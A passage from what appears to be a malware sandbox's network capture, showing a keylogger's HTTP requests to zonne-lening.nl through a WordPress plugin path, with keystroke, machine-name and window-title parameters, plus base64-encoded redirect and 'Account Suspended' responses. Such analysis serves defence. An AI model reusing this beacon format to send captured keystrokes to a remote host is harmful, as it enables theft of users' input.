WGM5WGtSTnVIaDNDdzhKWHRlZUNWN1pqZy93dWE4WUdsM1h2RFVQeS9jL0F2ZDQvaE5EU3FlZ1FB
QUFBQkpSVTVFcmtKZ2dnPT0pOwogICAgICAgICAgICB9CiAgICAgICAgICAgIC5jb250YWluZXIg
ewogICAgICAgICAgICAgICAgd2lkdGg6IDcwJTsKICAgICAgICAgICAgfQogICAgICAgICAgICAu
c3RhdHVzLXJlYXNvbiB7CiAgICAgICAgICAgICAgICBmb250LXNpemU6IDQ1MCU7CiAgICAgICAg
ICAgIH0KICAgICAgICAgICAgLmluZm8taGVhZGluZyB7CiAgICAgICAgICAgICAgICBmb250LXNp
emU6IDIwMCU7CiAgICAgICAgICAgIH0KICAgICAgICAgICAgLnJlYXNvbi10ZXh0IHsKICAgICAg
ICAgICAgICAgIGZvbnQtc2l6ZTogMTYwJTsKICAgICAgICAgICAgfQogICAgICAgIH0KICAgIDwv
c3R5bGU+CiAgICA8L2hlYWQ+CiAgICA8Ym9keT4KICAgICAgICA8ZGl2IGNsYXNzPSJjb250YWlu
ZXIiPgogICAgICAgICAgICA8c3BhbiBjbGFzcz0ic3RhdHVzLXJlYXNvbiI+CiAgICAgICAgICAg
ICAgICA8aSBjbGFzcz0iZmEgZmEtdXNlci10aW1lcyBmYS0yeCI+PC9pPiBBY2NvdW50IFN1c3Bl
bmRlZAogICAgICAgICAgICA8L3NwYW4+CiAgICAgICAgPC9kaXY+CiAgICAgICAgPHNlY3Rpb24g
Y2xhc3M9ImFkZGl0aW9uYWwtaW5mbyI+CiAgICAgICAgICAgIDxkaXYgY2xhc3M9ImNvbnRhaW5l
ciI+CiAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPSJhZGRpdGlvbmFsLWluZm8taXRlbXMiPgog
ICAgICAgICAgICAgICAgICAgIDxkaXYgY2xhc3M9ImluZm8taGVhZGluZyI+CiAgICAgICAgICAg
ICAgICAgICAgICAgIFRoaXMgQWNjb3VudCBoYXMgYmVlbiBzdXNwZW5kZWQuCiAgICAgICAgICAg
ICAgICAgICAgPC9kaXY+CiAgICAgICAgICAgICAgICAgICAgPGRpdiBjbGFzcz0icmVhc29uLXRl
eHQiPgogICAgICAgICAgICAgICAgICAgICAgICBDb250YWN0IHlvdXIgaG9zdGluZyBwcm92aWRl
ciBmb3IgbW9yZSBpbmZvcm1hdGlvbi4KICAgICAgICAgICAgICAgICAgICA8L2Rpdj4KICAgICAg
ICAgICAgICAgIDwvZGl2PgogICAgICAgICAgICA8L2Rpdj4KICAgICAgICA8L3NlY3Rpb24+CiAg
ICA8L2JvZHk+CjwvaHRtbD4K
Download
Download
SHA256
17fa2f3324d45c27a318ed51dab739c7f09b573185b76889b955ad2c9ad1d7b8
Referer
Magic
HyperText Markup Language (HTML)
Request
GET /cgi-sys/suspendedpage.cgi?type=keystrokes&machinename=WIN1&windowtitle=C:%5CUsers%5CAdministrator%5CDesktop%5Cmalware&keystrokestyped=&machinetime=7:53%20PM HTTP/1.1
Host: zonne-lening.nl
Response Header
HTTP/1.1 200 OK
Date: Wed, 30 Nov 2016 03:53:58 GMT
Server: Apache/2.4.23 (Unix) OpenSSL/1.0.1e-fips mod_bwlimited/1.4
Transfer-Encoding: chunked
Content-Type: text/html
Response Peek (128 B)
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-type" content="text/html; charset=utf-8">
<meta http-equiv="...
14 /wp-content/plugins/advanced-custom-fields/rajah/post.php?type=keystrokes&machinename=WIN1&windowtitle=rundll32.exe&keystrokestyped=&machinetime=7:54%20PM text/html post.php 302 Found HTML 345.0 B 09/20/07 12:01:00
PCFET0NUWVBFIEhUTUwgUFVCTElDICItLy9JRVRGLy9EVEQgSFRNTCAyLjAvL0VOIj4KPGh0bWw+
PGhlYWQ+Cjx0aXRsZT4zMDIgRm91bmQ8L3RpdGxlPgo8L2hlYWQ+PGJvZHk+CjxoMT5Gb3VuZDwv
aDE+CjxwPlRoZSBkb2N1bWVudCBoYXMgbW92ZWQgPGEgaHJlZj0iaHR0cDovL3pvbm5lLWxlbmlu
Zy5ubC9jZ2ktc3lzL3N1c3BlbmRlZHBhZ2UuY2dpP3R5cGU9a2V5c3Ryb2tlcyZhbXA7bWFjaGlu
ZW5hbWU9V0lOMSZhbXA7d2luZG93dGl0bGU9cnVuZGxsMzIuZXhlJmFtcDtrZXlzdHJva2VzdHlw
ZWQ9JmFtcDttYWNoaW5ldGltZT03OjU0JTIwUE0iPmhlcmU8L2E+LjwvcD4KPC9ib2R5PjwvaHRt
bD4K
Download
Download
SHA256
8d9320e95167b02f293581baa0aeffaabb6baddead6f70437c8701b19df628aa
Referer
Magic
HyperText Markup Language (HTML)
Request
GET /wp-content/plugins/advanced-custom-fields/rajah/post.php?type=keystrokes&machinename=WIN1&windowtitle=rundll32.exe&keystrokestyped=&machinetime=7:54%20PM HTTP/1.1
Host: zonne-lening.nl
Connection: Keep-Alive
Response Header
HTTP/1.1 302 Found
Date: Wed, 30 Nov 2016 03:54:12 GMT
Server: Apache/2.4.23 (Unix) OpenSSL/1.0.1e-fips mod_bwlimited/1.4
Location: http://zonne-lening.nl/cgi-sys/suspendedpage.cgi?type=keystrokes&machinename=WIN1&windowtitle=rundll32.exe&keystrokestyped=&machinetime=7:54%20PM
Content-Length: 345
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Response Peek (128 B)
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The doc...
15 /cgi-sys/suspendedpage.cgi?type=keystrokes&machinename=WIN1&windowtitle=rundll32.exe&keystrokestyped=&machinetime=7:54%20PM text/html suspendedpage.cgi 200 OK HTML 7.1 KB 09/20/07 20:27:29
PCFET0NUWVBFIGh0bWw+CjxodG1sPgogICAgPGhlYWQ+CiAgICA8bWV0YSBodHRwLWVxdWl2PSJD
b250ZW50LXR5cGUiIGNvbnRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD11dGYtOCI+CiAgICA8bWV0
YSBodHRwLWVxdWl2PSJDYWNoZS1jb250cm9sIiBjb250ZW50PSJuby1jYWNoZSI+CiAgICA8bWV0
YSBodHRwLWVxdWl2PSJQcmFnbWEiIGNvbnRlbnQ9Im5vLWNhY2hlIj4KICAgIDxtZXRhIGh0dHAt
ZXF1aXY9IkV4cGlyZXMiIGNvbnRlbnQ9IjAiPgogICAgPG1ldGEgbmFtZT0idmlld3BvcnQiIGNv
bnRlbnQ9IndpZHRoPWRldmljZS13aWR0aCwgaW5pdGlhbC1zY2FsZT0xLjAiPgogICAgPHRpdGxl
PkFjY291bnQgU3VzcGVuZGVkPC90aXRsZT4KICAgIDxsaW5rIHJlbD0ic3R5bGVzaGVldCIgaHJl
Zj0iLy9tYXhjZG4uYm9vdHN0cmFwY2RuLmNvbS9mb250LWF3ZXNvbWUvNC4zLjAvY3NzL2ZvbnQt
YXdlc29tZS5taW4uY3NzIj4KICAgIDxzdHlsZSB0eXBlPSJ0ZXh0L2NzcyI+CiAgICAgICAgYm9k
eSB7CiAgICAgICAgICAgIGZvbnQtZmFtaWx5OiBBcmlhbCwgSGVsdmV0aWNhLCBzYW5zLXNlcmlm
OwogICAgICAgICAgICBmb250LXNpemU6IDE0cHg7CiAgICAgICAgICAgIGxpbmUtaGVpZ2h0OiAx
LjQyODU3MTQyOTsKICAgICAgICAgICAgYmFja2dyb3VuZC1jb2xvcjogI2ZmZmZmZjsKICAgICAg
ICAgICAgY29sb3I6ICMyRjMyMzA7CiAgICAgICAgICAgIHBhZGRpbmc6IDA7CiAgICAgICAgICAg
IG1hcmdpbjogMDsKICAgICAgICB9CiAgICAgICAgc2VjdGlvbiB7CiAgICAgICAgICAgIGRpc3Bs
YXk6IGJsb2NrOwogICAgICAgICAgICBwYWRkaW5nOiAwOwogICAgICAgICAgICBtYXJnaW46IDA7
CiAgICAgICAgfQogICAgICAgIC5jb250YWluZXIgewogICAgICAgICAgICBtYXJnaW4tbGVmdDog
YXV0bzsKICAgICAgICAgICAgbWFyZ2luLXJpZ2h0OiBhdXRvOwogICAgICAgICAgICBwYWRkaW5n
OiAwIDEwcHg7CiAgICAgICAgfQogICAgICAgIC5hZGRpdGlvbmFsLWluZm8gewogICAgICAgICAg
ICBiYWNrZ3JvdW5kLXJlcGVhdDogbm8tcmVwZWF0OwogICAgICAgICAgICBiYWNrZ3JvdW5kLWNv
bG9yOiAjMjkzQTRBOwogICAgICAgICAgICBjb2xvcjogI0ZGRkZGRjsKICAgICAgICB9CiAgICAg
ICAgLmFkZGl0aW9uYWwtaW5mby1pdGVtcyB7CiAgICAgICAgICAgIHBhZGRpbmc6IDIwcHg7CiAg
ICAgICAgICAgIG1pbi1oZWlnaHQ6IDE5M3B4OwogICAgICAgIH0KICAgICAgICAuaW5mby1oZWFk
aW5nIHsKICAgICAgICAgICAgZm9udC13ZWlnaHQ6IGJvbGQ7CiAgICAgICAgICAgIHRleHQtYWxp
Z246IGxlZnQ7CiAgICAgICAgICAgIHdvcmQtYnJlYWs6IGJyZWFrLWFsbDsKICAgICAgICAgICAg
d2lkdGg6IDEwMCU7CiAgICAgICAgfQogICAgICAgIC5zdGF0dXMtcmVhc29uIHsKICAgICAgICAg
ICAgZm9udC1zaXplOiAyMDAlOwogICAgICAgICAgICBkaXNwbGF5OiBibG9jazsKICAgICAgICAg
ICAgY29sb3I6ICNDQ0NDQ0M7CiAgICAgICAgfQogICAgICAgIC5yZWFzb24tdGV4dCB7CiAgICAg
ICAgICAgIG1hcmdpbjogMjBweCAwOwogICAgICAgICAgICBmb250LXNpemU6IDE2cHg7CiAgICAg
ICAgfQogICAgICAgIC5pbmZvLWhlYWRpbmcgewogICAgICAgICAgICBmb250LXNpemU6IDE5MCU7
CiAgICAgICAgfQogICAgICAgIC5yZWFzb24tdGV4dCB7CiAgICAgICAgICAgIGZvbnQtc2l6ZTog
MTQwJTsKICAgICAgICB9CiAgICAgICAgQG1lZGlhIChtaW4td2lkdGg6IDc2OHB4KSB7CiAgICAg
ICAgICAgIC5hZGRpdGlvbmFsLWluZm8gewogICAgICAgICAgICAgICAgcG9zaXRpb246IHJlbGF0
aXZlOwogICAgICAgICAgICAgICAgb3ZlcmZsb3c6IGhpZGRlbjsKICAgICAgICAgICAgICAgIGJh
Y2tncm91bmQtaW1hZ2U6IG5vbmU7CiAgICAgICAgICAgIH0KICAgICAgICAgICAgLmFkZGl0aW9u
YWwtaW5mby1pdGVtcyB7CiAgICAgICAgICAgICAgICBwYWRkaW5nOiAyMHB4OwogICAgICAgICAg
ICB9CiAgICAgICAgICAgIC5jb250YWluZXIgewogICAgICAgICAgICAgICAgd2lkdGg6IDkwJTsK
ICAgICAgICAgICAgfQogICAgICAgICAgICAuc3RhdHVzLXJlYXNvbiB7CiAgICAgICAgICAgICAg
ICBkaXNwbGF5OiBpbmxpbmU7CiAgICAgICAgICAgIH0KICAgICAgICB9CiAgICAgICAgQG1lZGlh
IChtaW4td2lkdGg6IDk5MnB4KSB7CiAgICAgICAgICAgIC5hZGRpdGlvbmFsLWluZm8gewogICAg
ICAgICAgICAgICAgYmFja2dyb3VuZC1pbWFnZTogdXJsKGRhdGE6aW1hZ2UvcG5nO2Jhc2U2NCxp
VkJPUncwS0dnb0FBQUFOU1VoRVVnQUFBUEFBQUFEcUNBTUFBQUNyeGpoZEFBQUF0MUJNVkVVQUFB
QUFBQUQvLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8v
Ly8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8v
Ly8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy81K2ZuLy8vLy8v
Ly8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy82K3ZyLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8v
Ly8vLy8vLy8vLy8vK2k1ZWRUQUFBQVBYUlNUbE1BQVFFQ0F3UUZCZ2NJQ1FvTERBME9EeEFSRWhN
VUZSWVhHQmthR3h3ZEhoOGdJU0lqSkNVbUp5Z29LU29yTEMwdUx6QXdNVEl6TkRVMk56ZzVIN3gw
WEFBQUNuZEpSRUZVZUFIdFhYbHpHczhSN1RRM0NGa0h4cEt4aEl3dElCd2dJdVlZNHUvL3VWSjJx
cExLRDdROHQyWjd4cEQzbjZza2E5LzJiTTlNdno2b0dFeVhGb0tIZm1oZW9ld3g5Y1llaFZ1UEhN
VDRqcGh5QnROSHhIUW1ER2dCdlpqWEJ1V04yZ29nYlB5NlJ0Y09lak5QeEZrYitDRVloSENmbUo2
RFFTaGZFR2ZNdDcxRk9QZ3BFMVBIT01URVk4b1ozeUNyMlV0aUlucUVmdGozaUxNMThBZnN1L3hL
djlCNFFVenNWMVhLRlR6RFBHK0xmb0xwRS9Makpuek8wOFFDQXVnTGFsS2VxUC9tRW1XNlFqK0JQ
SUU3SVltVHl3MU1Gd2Jha3NheWJTeERDQTRTVEYrd2c4ckg3RXpNd3FOaWJZMzhtbHZYS0RkVTVw
REgzVFJrbDQwdnhKa1orRE8yTnUvM0hueUM3dDE1b2JHQnRxUkZSWG82KzBaNVlRaDVMSGQ5WUdX
T3NGKzlJczVvUVhjdFpLYnZkQUF0YkhITTgrR0xmb2pXZElnUGZmN1lpZlJUTmlabXVzVyt3OGZE
ajF4ZGV2Tm5iVTNWRmZURUwvVzMzcGZIMzFjR1lCcGdXOUxiYTNJYzhDOGlBNzdOTGU1MTR2dThC
UGo2L24zbENkL1ZrZ0tYR2t3WVVRSEFhTSt5UXVuQm1OU3diUlZZaCtrT2NnTWh2UkRCMU1kMjBZ
ZmlSK1VGZnZkSWl6cDJ2MXZWanQwdXNhMXBtTnpBWDJJRmw1L3hhRTlhcVFHU0Q2YnhJMFJaU3cz
dXVGMFlqUUhlcGpNeEhtZDlJZ0MxTmJZMVZTa2RlQjR2WE1IMEtTUVZJdlFmRVJjaU1wY2FGdFc0
SDhpSTBnQjJNemZFY1YzZ0IrSWtmRHRieUNBVGd0SEI3bDNUcktVRzJ5V09lN08yS1lRSVBFN3hG
RDEyWXZ5NlN2cW9MT01mOTVrK0J2Z3FvZ0NGQ3gyMk5kbHRPMWVwWWM3eWNFS1NhSTkrVUFZUEdP
bEtEUVl5eERQOU5wcXYwTktaa1M3R3VOUlFpZzVwdmFZUXdkVHp0alJuQ3JyL2wwYjJVZ08rd1J0
TWlGQ0F6cXBMTDBTbytoV21pNjFObjNhcUtHRXpEZkZybUVvS3FjV1NGRFJPTlNyQVUwaUZZTHJI
VTJSS0IzcStIeERIVDRKS0VlMnByaHhZMWFDUzVsWStIblh1Nk4reDZJSkNSUVFtRUV6K1lqSUUv
eHMvTW1EOHFIUllLNUNBSHVhVFk1amZReEZDL1lvSVFTU1ZhZnJEK1dLNEgwUGl2OFNBVFJaQ2hF
WGlPczM5TC9JWXdpT3hSSGdlRUtjbWJNSTljY0hSQ2R4VWVZYW5GcFFKTUJVRElGeHcxY2hKaUJB
b21rejN4NDNsK251V0dtV2hrUXMwYTZZN1lIVmU3NzJtMXRabFVCRWhLSTlrNm51TEU4YnpLVlNF
Q0VIZUNaU3lzcjA0cUpHblR6c1Z4Sm9Rd203YlBoUTdjemE1RUNHUUdwZzZUbmp6bVdCYlU3dEV4
a2hWdzM2eXozSENtMHFFdkVaOUM3dkRZWmVXQVFobktrUVVHL2k3TkRuQ0wvaHdidkpyNm1pUEtI
VGFPRTU0eHBCR3JsOFJJWEtYMWJrMytBMWFVaEh4VXRlM3NIRXZOU0lwNFJFZEJOT05BOU5PV1lF
d3VxNTRBaFBleDNOYUlRTHdISUlRbFFrUGJ3c1JGcGRtZGIvaEQ4VFNEQ3dUQnU4VzMwc1NJaVM3
UDlOd1o3Q2dBZURqbGFNOWt0QUQwK014d3JzZThYc1RhTW9SSW9DYVptZzNCUWdMcXJIVkNCdTNx
aFczK0FBT2h3cDUyUUlBZlFrQXdvREhLemZORVljazRaUHA1cWg1Q3A0VkZpTDhXTS9DbDhTRjRw
Z3RodnRIbTRxUVVJaVFkWSs1Tk1mdS8yMjhQa3EzTlpOTXFEMVc3ck1ucndKZVFFbUl3S3NhY01J
L1RWT0xsSGpRak0xWVZ0VlEzUndodk9SbzNja2lRNVpPVXpsQ09NeWk5WitMWFJFaFM1aXFySTRR
bnVObGY4b1ZFYks4QTU1NlFRSzBMTnJUajJ0aVdmY0ZuaDBoUElwWUVWR2ptQkFlMmI5NVUzd014
aW9pRXJSbTJudWhkOFFSQ0E4SXdUUkFXMU83UEFzYnRDUHlNTWdKcCsxL0lheHFHQVJ6ckZ0dHBo
VVIrTXZFUFN4KzZtL3BDeEVpM1k3cDQ4NUVTQVZtdWxkdnpTVEt3MmZxSFNHTTVoQlcxSVVJMGYv
TGRPTnRFVUtYR0M5NWpLK1JnNFFCVndObWxlUFpWalR4dW8yNGtXTXJRSGcvblp6eERxbXFGUkZD
Nzk5K2RiRWlyTW9WRVhoVkEwN1krR1dOTU9CQ3hJSXBDZ0NwQVg1S2dIQjZJUUlMSHdFM0hYazJY
UVZzemRTa0dFQ2pVQUJoUExNZFQvdUtMMFJJUThEellPS0p1OThWMDA2TGJTSWt2QnNSbHpCUFlr
SVJJSDE3NDNpRWllbEJUNGlRUmtOSHdVUU1VdFRXWHFzaVF1Z0Jpd2w3M09PclYwUklxLzYrQklQ
UFZWTHJiQVZBdWxRS0l3QU8vOWpVS3lKazUxU21PNXd3aHBIWGFjMEUzRVFFZlJJdTZUZkJZTFFu
L0ozZUNjRmRFN2k0ZHdtSGNrV0VySnNtVTdlSXNHbkx4cFZwVkVUSTRrVk0zVkNVdzErWGRSUFJh
TTBrNjRqTDFMRUZrQkJHUnc3YWQxWkUrQVZINzRYaDhOUU0vZFpNeFZLRGtQQ3lXbWJQSi84dUlR
Si9YYmlMOGJOS3Z2MHZXbExDYjBmUWpSOXp1VTF5K3NTa2pjcXNnUEF6Q1ZHRld6UHBZeEpNOUdB
TVhoR1JpbkQ4NXhrckN4RW9tRVk3STdqLzQwSUV2aldsSjd3RHpqSlp0bWJDVy9jQ2hPUFB0bElD
TUdYSUFYM1FGWVFJUmNJM0NxMlpOazN0WWR1dW5QeElwdXM4Sm9MaTVlMXUyeVdOMWt4ZDNVVjlW
WEFkdm5qbnRJa3NoMVYzQlNlL0RJVUlIQmRSQ01NVjZPbkhydFczYnhjOFZKVm1QUStJRlFtYnR5
VWdlamVtNlZzendhTko1SVFUOXI4QVVGMDQvRG9NSStOaDFaVzVNNGNoSjV5dU5STUFudjdUaDBQ
d1A3NHBUbDlValBaOEdqMTlQWVNuMFMxRlFHMlZmR3ZTUHF4cnA1Mm1CTjZJMjVuMkNUQk9PUkUw
LzZHaVZuOVlOZjhiRkJkNFJVUkZsV3pCdnlCRXFJaTRJOWFreSsycjI5NTk3L1pENjIreEtWZkJ0
Tk02cWFIUkc2MWVyWFBCT2ZPNkhON1VZbEptdXNscFdEVVRkWWFiNEwyejF2NDBoUFBCdnd6cU9s
dVR2aERCVkIyYTRJeXgvNFV4THJ4OGdveWNXMFVFZ080eTJMM0grVWw1WEkvNHZvYzZyWmtBM0Jw
djNuamZTL25oUjc4MUU1NE42dDRPZVd4UXh1a25ndUoxUzg0QVJSNFJ3QXF0bWFDRlpuUmlMMmxi
TStIYUFDNW5wcStJd0YrNmhoZkJXek5ObFc2cUNyR1hSeXphMHlOT2QxRTFmc1lVQzdVVjJKb3A3
WHlYYnN3OTBLWVVJbmpwa1JjZWNXZmtFbWRDQWVoZ3VldVRtTnQrc2hrUmVLZDN2NjduUDljTkRK
SHZvRCsreGR2cG92WEtDcDVTZm9HeEhzajB5RitJd0hVdXM3c21WaDhJSFZHSXdKdEx5N3VONlBl
L3dBbnJCeE9uQWF5SVNMV2tROHdvQkt5UisrZFVUc3VFSytMOHAyQkQ0Zkdkc2ZxaHhHUVRRWmx1
SFVMWHJSc1VGZkJFME9neklscmFSOHZrdzZxblhtdURTRjhSZ1M4dGgrZCtwaGNpOEZKZjFmd2Fw
aTQ0ckZwZnFUWkFuVytKRlJHM2tmOTRaK3NTcWRSMVVJaUkvZGMvQjZOL005V3NpQURPMDBBM1FV
MGhvaFg1UlRkZUNyc3R5VDFXcGhVUlRCZXZCYVY0aXdZSkdHY3RSREMxRnNHYVEzUnRHRmZMNG9z
MzRnNlQrQWtBVDg0YnMwZlgyd2VTODhYN1g2aFhSRERSemR3SFovNUQyaGpqZ2h0M01iNXkxTklO
cStiZVpCdThkODQ2NTd3UFlmTjhwWkJjMGcrSktpS1lpTnI5cjR2MVpydmRidGF6cDE2VFNDT2Za
cHBNaUdENmlWcXIyNzFvVm9rVTZBSjlVNUZHblhJd3c1bUgra0xFaHhJMWNsMjBRQ0dDVGdSTUEv
MytGMmxSWFh0elhoVVJQVFR0OUdRQTZoK2QvMWRFNUFuOUdSSDVvNW13SWdLSHZoQ0JpNWo2MEJj
aThvZStFS0VQclltZytRTk5PdzNQZENMZ3BCVVJPUFExOG1YMVpFeDhwOS8vSWkwcWMzUWk2Q21B
VTFkRXBEOVNBMXRUOTgvR1phZHZmMjlHeFBZUGg5bitNakF1Uk5nL0hjNFdZbThXalQwcEFCTkI3
V2tBYjgxa3o4ZkVvNU5hMHJBUVlVOEtRRVdFUFNrQWFhZm5SUGlYRUdIUENDYmNueHBoSUVQUG5o
WGM5WGtSTnVIaDNDdzhKWHRlZUNWN1pqZy93dWE4WUdsM1h2RFVQeS9jL0F2ZDQvaE5EU3FlZ1FB
QUFBQkpSVTVFcmtKZ2dnPT0pOwogICAgICAgICAgICB9CiAgICAgICAgICAgIC5jb250YWluZXIg
ewogICAgICAgICAgICAgICAgd2lkdGg6IDcwJTsKICAgICAgICAgICAgfQogICAgICAgICAgICAu
c3RhdHVzLXJlYXNvbiB7CiAgICAgICAgICAgICAgICBmb250LXNpemU6IDQ1MCU7CiAgICAgICAg
ICAgIH0KICAgICAgICAgICAgLmluZm8taGVhZGluZyB7CiAgICAgICAgICAgICAgICBmb250LXNp
emU6IDIwMCU7CiAgICAgICAgICAgIH0KICAgICAgICAgICAgLnJlYXNvbi10ZXh0IHsKICAgICAg
ICAgICAgICAgIGZvbnQtc2l6ZTogMTYwJTsKICAgICAgICAgICAgfQogICAgICAgIH0KICAgIDwv
c3R5bGU+CiAgICA8L2hlYWQ+CiAgICA8Ym9keT4KICAgICAgICA8ZGl2IGNsYXNzPSJjb250YWlu
ZXIiPgogICAgICAgICAgICA8c3BhbiBjbGFzcz0ic3RhdHVzLXJlYXNvbiI+CiAgICAgICAgICAg
ICAgICA8aSBjbGFzcz0iZmEgZmEtdXNlci10aW1lcyBmYS0yeCI+PC9pPiBBY2NvdW50IFN1c3Bl
bmRlZAogICAgICAgICAgICA8L3NwYW4+CiAgICAgICAgPC9kaXY+CiAgICAgICAgPHNlY3Rpb24g
Y2xhc3M9ImFkZGl0aW9uYWwtaW5mbyI+CiAgICAgICAgICAgIDxkaXYgY2xhc3M9ImNvbnRhaW5l
ciI+CiAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPSJhZGRpdGlvbmFsLWluZm8taXRlbXMiPgog
ICAgICAgICAgICAgICAgICAgIDxkaXYgY2xhc3M9ImluZm8taGVhZGluZyI+CiAgICAgICAgICAg
ICAgICAgICAgICAgIFRoaXMgQWNjb3VudCBoYXMgYmVlbiBzdXNwZW5kZWQuCiAgICAgICAgICAg
ICAgICAgICAgPC9kaXY+CiAgICAgICAgICAgICAgICAgICAgPGRpdiBjbGFzcz0icmVhc29uLXRl
eHQiPgogICAgICAgICAgICAgICAgICAgICAgICBDb250YWN0IHlvdXIgaG9zdGluZyBwcm92aWRl
ciBmb3IgbW9yZSBpbmZvcm1hdGlvbi4KICAgICAgICAgICAgICAgICAgICA8L2Rpdj4KICAgICAg
ICAgICAgICAgIDwvZGl2PgogICAgICAgICAgICA8L2Rpdj4KICAgICAgICA8L3NlY3Rpb24+CiAg
ICA8L2JvZHk+CjwvaHRtbD4K
Download
Download
SHA256
17fa2f3324d45c27a318ed51dab739c7f09b573185b76889b955ad2c9ad1d7b8
Referer
Magic
HyperText Markup Language (HTML)
Request
GET /cgi-sys/suspendedpage.cgi?type=keystrokes&machinename=WIN1&windowtitle=rundll32.exe&keystrokestyped=&machinetime=7:54%20PM HTTP/1.1
Host: zonne-lening.nl
Response Header
HTTP/1.1 200 OK
Date: Wed, 30 Nov 2016 03:54:12 GMT
Server: Apache/2.4.23 (Unix) OpenSSL/1.0.1e-fips mod_bwlimited/1.4
Transfer-Encoding: chunked
Content-Type: text/html
Response Peek (128 B)
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-type" content="text/html; charset=utf-8">
<meta http-equiv="...
16 /wp-content/plugins/advanced-custom-fields/rajah/post.php?type=keystrokes&machinename=WIN1&windowtitle=C:%5CUsers%5CAdministrator%5CDesktop%5Cmalware&keystrokestyped=&machinetime=7:54%20PM text/html post.php 302 Found HTML 379.0 B 09/22/07 23:40:58
PCFET0NUWVBFIEhUTUwgUFVCTElDICItLy9JRVRGLy9EVEQgSFRNTCAyLjAvL0VOIj4KPGh0bWw+
PGhlYWQ+Cjx0aXRsZT4zMDIgRm91bmQ8L3RpdGxlPgo8L2hlYWQ+PGJvZHk+CjxoMT5Gb3VuZDwv
aDE+CjxwPlRoZSBkb2N1bWVudCBoYXMgbW92ZWQgPGEgaHJlZj0iaHR0cDovL3pvbm5lLWxlbmlu
Zy5ubC9jZ2ktc3lzL3N1c3BlbmRlZHBhZ2UuY2dpP3R5cGU9a2V5c3Ryb2tlcyZhbXA7bWFjaGlu
ZW5hbWU9V0lOMSZhbXA7d2luZG93dGl0bGU9QzolNUNVc2VycyU1Q0FkbWluaXN0cmF0b3IlNUNE
ZXNrdG9wJTVDbWFsd2FyZSZhbXA7a2V5c3Ryb2tlc3R5cGVkPSZhbXA7bWFjaGluZXRpbWU9Nzo1
NCUyMFBNIj5oZXJlPC9hPi48L3A+CjwvYm9keT48L2h0bWw+Cg==
Download
Download
SHA256
75ee15d83f704299631acd15cd629b6aaac4a3eca52e5eb78c5ea635262b1eea
Referer
Magic
HyperText Markup Language (HTML)
Request
GET /wp-content/plugins/advanced-custom-fields/rajah/post.php?type=keystrokes&machinename=WIN1&windowtitle=C:%5CUsers%5CAdministrator%5CDesktop%5Cmalware&keystrokestyped=&machinetime=7:54%20PM HTTP/1.1
Host: zonne-lening.nl
Response Header
HTTP/1.1 302 Found
Date: Wed, 30 Nov 2016 03:54:14 GMT
Server: Apache/2.4.23 (Unix) OpenSSL/1.0.1e-fips mod_bwlimited/1.4
Location: http://zonne-lening.nl/cgi-sys/suspendedpage.cgi?type=keystrokes&machinename=WIN1&windowtitle=C:%5CUsers%5CAdministrator%5CDesktop%5Cmalware&keystrokestyped=&machinetime=7:54%20PM
Content-Length: 379
Content-Type: text/html; charset=iso-8859-1
Response Peek (128 B)
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The doc...
17 /cgi-sys/suspendedpage.cgi?type=keystrokes&machinename=WIN1&windowtitle=C:%5CUsers%5CAdministrator%5CDesktop%5Cmalware&keystrokestyped=&machinetime=7:54%20PM text/html suspendedpage.cgi 200 OK HTML 7.1 KB 09/23/07 06:54:32
PCFET0NUWVBFIGh0bWw+CjxodG1sPgogICAgPGhlYWQ+CiAgICA8bWV0YSBodHRwLWVxdWl2PSJD
b250ZW50LXR5cGUiIGNvbnRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD11dGYtOCI+CiAgICA8bWV0
YSBodHRwLWVxdWl2PSJDYWNoZS1jb250cm9sIiBjb250ZW50PSJuby1jYWNoZSI+CiAgICA8bWV0
YSBodHRwLWVxdWl2PSJQcmFnbWEiIGNvbnRlbnQ9Im5vLWNhY2hlIj4KICAgIDxtZXRhIGh0dHAt
ZXF1aXY9IkV4cGlyZXMiIGNvbnRlbnQ9IjAiPgogICAgPG1ldGEgbmFtZT0idmlld3BvcnQiIGNv
bnRlbnQ9IndpZHRoPWRldmljZS13aWR0aCwgaW5pdGlhbC1zY2FsZT0xLjAiPgogICAgPHRpdGxl
PkFjY291bnQgU3VzcGVuZGVkPC90aXRsZT4KICAgIDxsaW5rIHJlbD0ic3R5bGVzaGVldCIgaHJl
Zj0iLy9tYXhjZG4uYm9vdHN0cmFwY2RuLmNvbS9mb250LWF3ZXNvbWUvNC4zLjAvY3NzL2ZvbnQt
YXdlc29tZS5taW4uY3NzIj4KICAgIDxzdHlsZSB0eXBlPSJ0ZXh0L2NzcyI+CiAgICAgICAgYm9k
eSB7CiAgICAgICAgICAgIGZvbnQtZmFtaWx5OiBBcmlhbCwgSGVsdmV0aWNhLCBzYW5zLXNlcmlm
OwogICAgICAgICAgICBmb250LXNpemU6IDE0cHg7CiAgICAgICAgICAgIGxpbmUtaGVpZ2h0OiAx
LjQyODU3MTQyOTsKICAgICAgICAgICAgYmFja2dyb3VuZC1jb2xvcjogI2ZmZmZmZjsKICAgICAg
ICAgICAgY29sb3I6ICMyRjMyMzA7CiAgICAgICAgICAgIHBhZGRpbmc6IDA7CiAgICAgICAgICAg
IG1hcmdpbjogMDsKICAgICAgICB9CiAgICAgICAgc2VjdGlvbiB7CiAgICAgICAgICAgIGRpc3Bs
YXk6IGJsb2NrOwogICAgICAgICAgICBwYWRkaW5nOiAwOwogICAgICAgICAgICBtYXJnaW46IDA7
